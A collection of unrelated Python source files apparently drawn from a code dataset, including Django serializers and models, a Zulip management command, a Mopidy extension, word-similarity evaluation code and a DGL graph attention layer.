if negative:
x = -x
return fdl.Config(function_to_configure, x=x)
def arbitrary_other_function(x, y): # pylint: disable=unused-argument
pass
def fiddler1(cfg: fdl.Config): # pylint: disable=unused-argument
pass
def fiddler2(cfg: fdl.Config): # pylint: disable=unused-argument
pass
def another_fiddler(cfg: fdl.Config, defaulted_arg=3): # pylint: disable=unused-argument
pass
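# Illustrative usage sketch (not from the original source): consuming these
# base configs through Fiddle's standard build entry point.
# cfg = simple_base()
# cfg.y = 'hello'
# fiddler1(cfg)
# assert fdl.build(cfg) == (2, 'hello')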
| StarcoderdataPython |
101055 | # Django imports
from rest_framework.serializers import ModelSerializer, ReadOnlyField
# Project imports
from address.serializers import AddressSerializer
from client.serializers import ClientSerializer
from user_address.models import UserAddress
from .models import User
class UserSerializer(ModelSerializer):
addresses = AddressSerializer(read_only=True, many=True)
client = ClientSerializer(read_only=True)
date_joined = ReadOnlyField()
class Meta:
model = User
fields = (
'id',
'email',
'first_name',
'last_name',
'date_joined',
'password',
'addresses',
'client',
)
extra_kwargs = {
            'password': {'write_only': True},  # assumed setting; the original value was redacted
}
def to_representation(self, instance):
ret = super().to_representation(instance)
user_addresses = UserAddress.objects.filter(user__id=instance.id).distinct()
if user_addresses is not None:
serialized = AddressSerializer(data=user_addresses, many=True)
ret.update({
'addresses': serialized.data if serialized.is_valid() else [],
})
return ret
| StarcoderdataPython |
3267213 | # -*- coding: utf8 -*-
"Namespace-related models"
from uuid import uuid4
from django.db import models
class Namespace(models.Model):
"Namespace model"
uuid = models.UUIDField(primary_key=True, default=uuid4, editable=False)
name = models.CharField(max_length=255)
@property
def groups(self):
"Iterable list of all variables groups in this namespace"
return self.groups_relation.all()
@property
def workflows(self):
"Iterable list of all workflows in this namespace"
return self.workflows_relation.all()
def __unicode__(self):
return self.name
class Meta:
permissions = (
('view_namespace', 'Voir le namespace'),
)
ordering = ['name']
| StarcoderdataPython |
1755976 | import datetime
from gw_utility.book import Book
from gw_utility.logging import Logging
def main():
Logging.line_separator("BOTH INCLUDE PUBLICATION DATES", 50, '+')
# Create two Books with identical arguments.
the_stand = Book("The Stand", "<NAME>", 1153, datetime.date(1978, 1, 1))
the_stand_2 = Book("The Stand", "<NAME>", 1153, datetime.date(1978, 1, 1))
# Check equivalency of Books.
check_equality(the_stand, the_stand_2)
Logging.line_separator("ONE MISSING PUBLICATION DATE", 50, '+')
# Create two Books, one without publication_date argument specified.
the_hobbit = Book("The Hobbit", "<NAME>", 366, datetime.date(1937, 9, 15))
the_hobbit_2 = Book("The Hobbit", "<NAME>", 366)
# Check equivalency of Books.
check_equality(the_hobbit, the_hobbit_2)
def check_equality(a, b):
"""Asserts the equivalent of the two passed objects.
:param a: First object.
:param b: Second object.
:return: Indicates if assertion was successful.
"""
try:
Logging.line_separator("ASSERTING EQUIVALENCE OF...")
# Output objects using __str__ method.
Logging.log(a)
Logging.log(b)
# Assert equivalence of objects, indicating inequality if failed.
assert a == b, "The objects ARE NOT equal."
# Indicate that assertion succeeded.
Logging.log("The objects are equal.")
return True
except AssertionError as error:
# Output expected AssertionErrors.
Logging.log_exception(error)
except Exception as exception:
# Output unexpected Exceptions.
Logging.log_exception(exception, False)
if __name__ == "__main__":
main()
| StarcoderdataPython |
4823678 | from .venmo import Venmo
def setup(bot):
bot.add_cog(Venmo(bot))
| StarcoderdataPython |
1671337 | __author__ = '<NAME>'
import numpy as np
from scipy.stats import spearmanr
class QuestionBase:
def __init__(self, filename):
self.word1 = []
self.word2 = []
self.sims = []
iFile = open(filename)
for line in iFile:
self.word1.append(line.split(',')[0])
self.word2.append(line.split(',')[1])
self.sims.append(float(line.split(',')[2]))
def __str__(self):
ret = ''
for i in range(self.word1.__len__()):
ret += 'Word 1 ' + self.word1[i] + '\n'
            ret += 'Word 2 ' + self.word2[i] + '\n'
            ret += 'Similarity ' + str(self.sims[i]) + '\n\n'
return ret
def evaluate(self):
avgA = 0
for w in self.sims:
avgA += w
avgA /= len(self.sims)
stdDevA = 0
for w in self.sims:
stdDevA += np.power(w - avgA,2.0)
stdDevA /= len(self.sims)
stdDevA = np.sqrt(stdDevA)
avgB = 0
for w in self.simCalcs:
avgB += w
avgB /= len(self.simCalcs)
stdDevB = 0
for w in self.simCalcs:
stdDevB += np.power(w - avgB,2.0)
stdDevB /= len(self.simCalcs)
stdDevB = np.sqrt(stdDevB)
plotted = []
for i in range(len(self.sims)):
plotted.append(self.sims[i]*self.simCalcs[i])
EA = 0
EB = 0
EAB = 0
for i in range(len(self.sims)):
EA += self.sims[i]
EB += self.simCalcs[i]
EAB += plotted[i]
EA /= len(self.sims)
EB /= len(self.sims)
EAB /= len(self.sims)
cov = EAB - (EA*EB)
cor = cov / (stdDevA * stdDevB)
return cor
def classify(self,Classifier, oFile):
self.simCalcs = []
for i in range(self.word1.__len__()):
similarity = Classifier.Similarity(self.word1[i],self.word2[i])
self.simCalcs.append(similarity)
oFile.write(self.word1[i] + " " + self.word2[i] + " " + str(self.sims[i]) + " " + str(self.simCalcs[i]) + "\n")
oFile.write(str(self.evaluate()))
oFile.write('\n')
oFile.write(str(spearmanr(self.sims,self.simCalcs).correlation))
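# Illustrative usage sketch (not from the original source): classify() accepts
# any object exposing Similarity(word1, word2); the stand-in below is purely
# hypothetical.
class _ConstantClassifier:
    def Similarity(self, word1, word2):
        return 1.0 if word1 == word2 else 0.5
# questions = QuestionBase('wordsim.csv')      # CSV rows: word1,word2,similarity
# with open('results.txt', 'w') as out_file:
#     questions.classify(_ConstantClassifier(), out_file)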
| StarcoderdataPython |
5636 | # zerver/management/commands/list_realms.py
import sys
from typing import Any
from argparse import ArgumentParser
from zerver.models import Realm
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """List realms in the server and it's configuration settings(optional).
Usage examples:
./manage.py list_realms
./manage.py list_realms --all"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument("--all",
dest="all",
action="store_true",
default=False,
help="Print all the configuration settings of the realms.")
def handle(self, *args: Any, **options: Any) -> None:
realms = Realm.objects.all()
outer_format = "%-5s %-40s %-40s"
inner_format = "%-40s %s"
deactivated = False
if not options["all"]:
print(outer_format % ("id", "string_id", "name"))
print(outer_format % ("--", "---------", "----"))
for realm in realms:
if realm.deactivated:
print(self.style.ERROR(outer_format % (realm.id, realm.string_id, realm.name)))
deactivated = True
else:
print(outer_format % (realm.id, realm.string_id, realm.name))
if deactivated:
print(self.style.WARNING("\nRed rows represent deactivated realms."))
sys.exit(0)
# The remaining code path is the --all case.
identifier_attributes = ["id", "name", "string_id"]
for realm in realms:
# Start with just all the fields on the object, which is
# hacky but doesn't require any work to maintain.
realm_dict = realm.__dict__
# Remove a field that is confusingly useless
del realm_dict['_state']
# Fix the one bitfield to display useful data
realm_dict['authentication_methods'] = str(realm.authentication_methods_dict())
for key in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, realm_dict[key])))
deactivated = True
else:
print(inner_format % (key, realm_dict[key]))
            for key, value in sorted(realm_dict.items()):
if key not in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, value)))
else:
print(inner_format % (key, value))
print("-" * 80)
if deactivated:
print(self.style.WARNING("\nRed is used to highlight deactivated realms."))
| StarcoderdataPython |
3214258 | # repo: clean-code-craft-tcq-1/stream-bms-data-ParthasaradhiWinfo
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 24 02:25:37 2021
@author: VNO1COB
"""
import json
def read_sender_inputs():
try:
input_value = input()
input_dict = json.loads(input_value)
print(input_dict)
print(input_dict["temperature"])
print(input_dict["chargerate"])
return input_dict["temperature"],input_dict["chargerate"]
except EOFError:
return None,None
def average_of_input_list(list_of_input_readings):
min_max_avg_list = []
min_max_avg_list.append(min(list_of_input_readings))
min_max_avg_list.append(max(list_of_input_readings))
if len(list_of_input_readings) >= 5:
        min_max_avg_list.append(sum(list_of_input_readings[-5:]) / len(list_of_input_readings[-5:]))
return min_max_avg_list
def averagecalculation(temperature,chargerate):
min_max_dict = {}
min_max_dict["temperature"] = average_of_input_list(temperature)
min_max_dict["chargerate"] = average_of_input_list(chargerate)
print(min_max_dict)
return min_max_dict
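# Illustrative usage sketch (not from the original source): hard-coded readings
# in place of the JSON lines that read_sender_inputs() consumes from stdin.
if __name__ == '__main__':
    temperatures = [25.0, 26.5, 27.0, 28.5, 30.0, 31.5]
    charge_rates = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6]
    averagecalculation(temperatures, charge_rates)  # prints min, max and rolling average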
| StarcoderdataPython |
4831389 | # mopidy_iris/__init__.py
from __future__ import unicode_literals
import logging, os, json
import tornado.web
import tornado.websocket
import handlers
import mem
from mopidy import config, ext
from frontend import IrisFrontend
from handlers import WebsocketHandler, HttpHandler
from core import IrisCore
logger = logging.getLogger(__name__)
__version__ = '2.13.5'
##
# Core extension class
#
# Loads config and gets the party started. Initiates any additional frontends, etc.
##
class Extension( ext.Extension ):
dist_name = 'Mopidy-Iris'
ext_name = 'iris'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = config.ConfigSchema(self.ext_name)
schema['enabled'] = config.Boolean()
schema['pusherport'] = config.String()
schema['country'] = config.String()
schema['locale'] = config.String()
return schema
def setup(self, registry):
# Add web extension
registry.add('http:app', {
'name': self.ext_name,
'factory': iris_factory
})
# create our core instance
mem.iris = IrisCore()
mem.iris.version = self.version
# Add our frontend
registry.add('frontend', IrisFrontend)
def iris_factory(config, core):
path = os.path.join( os.path.dirname(__file__), 'static')
return [
(r"/images/(.*)", tornado.web.StaticFileHandler, {
'path': config['local-images']['image_dir']
}),
(r'/http/([^/]*)', handlers.HttpHandler, {
'core': core,
'config': config
}),
(r'/ws/?', handlers.WebsocketHandler, {
'core': core,
'config': config
}),
(r'/(.*)', tornado.web.StaticFileHandler, {
'path': path,
'default_filename': 'index.html'
}),
]
| StarcoderdataPython |
3357428 | <reponame>WingsUpete/EEG2Age
import dgl
import torch
import torch.nn as nn
import torch.nn.functional as F
class PwGaANLayer(nn.Module):
def __init__(self, in_dim, out_dim, num_nodes, num_heads=1, gate=False):
super(PwGaANLayer, self).__init__()
self.in_dim = in_dim
self.out_dim = out_dim
self.num_nodes = num_nodes
self.num_heads = num_heads
# Shared Weight W_a for AttentionNet
self.Wa = nn.Linear(self.in_dim, self.out_dim, bias=False)
# AttentionNet outer linear layer
# split fc to avoid cat
self.att_out_fc_l = nn.Linear(self.out_dim, 1, bias=False)
self.att_out_fc_r = nn.Linear(self.out_dim, 1, bias=False)
# Head gate layer
self.gate = gate
if self.gate:
# split fc to avoid cat
self.gate_fc_l = nn.Linear(self.in_dim, 1, bias=False)
self.gate_fc_m = nn.Linear(self.out_dim, 1, bias=False)
self.gate_fc_r = nn.Linear(self.in_dim, 1, bias=False)
self.Wg = nn.Linear(self.in_dim, self.out_dim, bias=False)
self.reset_parameters()
def reset_parameters(self):
""" Reinitialize learnable parameters. """
gain = nn.init.calculate_gain('leaky_relu')
nn.init.xavier_normal_(self.Wa.weight, gain=gain)
nn.init.xavier_normal_(self.att_out_fc_l.weight, gain=gain)
nn.init.xavier_normal_(self.att_out_fc_r.weight, gain=gain)
if self.gate:
gain = nn.init.calculate_gain('sigmoid')
nn.init.xavier_normal_(self.Wg.weight, gain=gain)
nn.init.xavier_normal_(self.gate_fc_l.weight, gain=gain)
nn.init.xavier_normal_(self.gate_fc_m.weight, gain=gain)
nn.init.xavier_normal_(self.gate_fc_r.weight, gain=gain)
def edge_attention(self, edges):
a = self.att_out_fc_l(edges.data['pre_w'] * edges.src['z']) + self.att_out_fc_r(edges.dst['z'])
return {'e': F.leaky_relu(a)}
def message_func(self, edges):
""" Specify messages to be propagated along edges """
# The messages will be sent to the mailbox
# mailbox['proj_z']: z->x, so we need z's projected features
# mailbox['e']: z->x has a e for attention calculation
if self.gate:
pwFeat = edges.data['pre_w'] * edges.src['v']
return {'proj_z': edges.src['proj_z'], 'e': edges.data['e'], 'pre_v_g': pwFeat}
else:
return {'proj_z': edges.src['proj_z'], 'e': edges.data['e']}
def reduce_func(self, nodes):
""" Specify how messages are processed and propagated to nodes """
# Aggregate features to nodes
alpha = F.softmax(nodes.mailbox['e'], dim=1)
alpha = F.dropout(alpha, 0.1)
h = torch.sum(alpha * nodes.mailbox['proj_z'], dim=1)
# head gates
if self.gate:
pwFeat = nodes.mailbox['pre_v_g']
gateProj = self.Wg(pwFeat)
maxFeat = torch.max(gateProj, dim=1)[0]
meanFeat = torch.mean(pwFeat, dim=1)
gFCVal = self.gate_fc_l(nodes.data['v']) + self.gate_fc_m(maxFeat) + self.gate_fc_r(meanFeat)
gVal = torch.sigmoid(gFCVal)
h = gVal * h
return {'h': h}
def forward(self, g: dgl.DGLGraph):
with g.local_scope():
feat = g.ndata['v']
# Wa: shared attention to features v (or h for multiple GAT layers)
z = self.Wa(feat)
g.ndata['z'] = z
# AttentionNet
g.apply_edges(self.edge_attention)
# Message Passing
g.update_all(self.message_func, self.reduce_func)
return (g.ndata['proj_z'] + g.ndata['h']).reshape(self.num_heads, int(g.batch_size / self.num_heads), self.num_nodes, -1, self.out_dim)
class MultiHeadPwGaANLayer(nn.Module):
def __init__(self, in_dim, out_dim, num_nodes, num_heads, merge='cat', gate=False):
super(MultiHeadPwGaANLayer, self).__init__()
self.gate = gate
self.num_heads = num_heads
self.pwGaAN = PwGaANLayer(in_dim, out_dim, num_nodes=num_nodes, num_heads=self.num_heads, gate=self.gate)
self.merge = merge
def forward(self, g: dgl.DGLGraph):
batch_g = dgl.batch([g for i in range(self.num_heads)])
head_outs = self.pwGaAN(batch_g)
del batch_g
if self.merge == 'cat':
return head_outs.permute(1, 2, 3, 0, 4).reshape(head_outs.shape[-4], head_outs.shape[-3], head_outs.shape[-2], -1)
elif self.merge == 'mean':
return torch.mean(head_outs, dim=0)
else:
return head_outs.permute(1, 2, 3, 0, 4).reshape(head_outs.shape[-4], head_outs.shape[-3], head_outs.shape[-2], -1) # Default: cat
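# Illustrative usage sketch (not from the original source): a toy graph for
# exercising the layer. The forward pass reads three caller-provided fields --
# node features g.ndata['v'], externally projected features g.ndata['proj_z']
# (out_dim wide), and per-edge weights g.edata['pre_w'] -- so random values are
# assumed here purely for illustration.
if __name__ == '__main__':
    num_nodes, in_dim, out_dim, num_heads = 4, 8, 16, 2
    src = torch.tensor([0, 1, 2, 3, 0, 2])
    dst = torch.tensor([1, 2, 3, 0, 2, 0])
    g = dgl.graph((src, dst), num_nodes=num_nodes)
    g.ndata['v'] = torch.randn(num_nodes, in_dim)
    g.ndata['proj_z'] = torch.randn(num_nodes, out_dim)
    g.edata['pre_w'] = torch.rand(g.num_edges(), 1)
    layer = MultiHeadPwGaANLayer(in_dim, out_dim, num_nodes=num_nodes,
                                 num_heads=num_heads, gate=True)
    out = layer(g)
    print(out.shape)  # (1, num_nodes, 1, num_heads * out_dim) with merge='cat'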
| StarcoderdataPython |